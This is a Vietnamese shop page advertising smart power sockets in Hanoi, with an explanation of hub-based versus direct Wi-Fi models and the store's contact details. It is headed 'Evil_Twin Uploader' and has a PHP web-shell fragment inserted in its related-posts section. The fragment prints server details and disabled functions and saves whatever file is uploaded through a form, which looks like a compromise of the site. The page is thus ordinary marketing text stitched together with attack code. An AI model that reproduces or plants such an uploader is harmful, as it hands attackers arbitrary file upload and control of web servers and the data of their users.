Evil_Twin Uploader

Mua ổ điện thông minh tại Hà Nội

Ổ điện thông minh là gì?

Ổ điện thông minh thực chất là một thiết bị điện có tích hợp thêm các tính năng thông minh cho phép người sử dụng đóng/ngắt điện vào Ổ cắm từ xa thông qua các thiết bị di động như Smartphone hoặc Ipad.
Hiện nay trên thị trường thiết bị điện gia dụng, Ổ điện thông minh khá phổ biến. Có rất nhiều hãng sản xuất và phân phối thiết bị này chính vì vậy bạn có thể thoải mái lựa chọn loại. Ổ cắm điện thông minh vừa phù hợp với mục đích sử dụng vừa phù hợp với khả năng thanh toán của bạn.

Ổ điện thông minh tại Hà Nội

Ổ điện thông minh tại Hà Nội

Cơ chế hoạt động của Ổ điện thông minh

Cơ chế hoạt động của Ổ điện thông minh giống với cơ chế hoạt động của các loại Công tắc điện thông minh vì chúng đều là bộ phận của giải pháp Nhà thông minh tổng thể.

Tuy nhiên cơ chế hoạt động này ở mỗi hãng là có sự khác biệt, cụ thể được chia làm 2 loại:

– Ổ điện thông minh kết nối với Bộ điều khiển trung tâm

Đây là loại khá phổ biển. Ổ cắm điện thông minh sẽ kết nối với Bộ điều khiển trung tâm qua công nghệ không dây như Wifi, Zigbee, Bluetooth,…, còn Bộ điều khiển sẽ kết nối với Smartphone của bạn bằng mạng Internet.

Cụ thể là khi muốn điều khiển đóng ngắt điện hay hẹn giờ hoạt động tự động cho Ổ cắm bạn chỉ cần sử dụng điện thoại để tạo lệnh trên ứng dụng Nhà thông minh, sau đó lệnh sẽ được truyền đến Bộ điều khiển trung tâm xử lý và truyền đến Ổ cắm để chúng thực hiện.

Ưu điểm của loại này là ổn định, không bị ảnh hưởng khi mạng yếu hay chập chờn.

– Ổ điện thông minh không cần kết nối với Bộ điều khiển trung tâm

Đây là loại có cách thức hoạt động khác hẳn với loại trên vì ở mỗi chiếc Ổ điện thông minh đã được lập trình thêm chế độ tự động bắt mạng Wifi.

Khi cần Ổ cắm thực hiện yêu cầu, bạn tạo lệnh điều khiển ngay trên ứng dụng được cài trong Smarthone, ngay sau đó lệnh sẽ được truyền đến từng Ổ cắm luôn mà không cần đến Bộ điều khiển trung tâm nữa.

Ưu điểm của loại này là hoạt động theo cơ chế đơn giản nhưng dễ bị gián đoạn trong quá trình sử dụng khi mạng không ổn định.

Ổ điện thông minh tại Hà Nội

Ổ điện thông minh tại Hà Nội

Mua ổ điện thông minh tại Hà Nội

Quý khách quan tâm đến ổ điện thông minh tại Hà Nội có thể trực tiếp ghé thăm cửa hàng tại địa chỉ LK 6-9, Khu Nhà ở Ngô Thì Nhậm, Phường Hà Cầu , Q. Hà Đông, TP. HN hoặc truy cập website: homesecurity.com.vn hay liên hệ số máy 024.6688.7518 – 0963.493.586 để biết thêm chi tiết về các sản phẩm và những chương trình khuyến mãi, ưu đãi hấp dẫn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial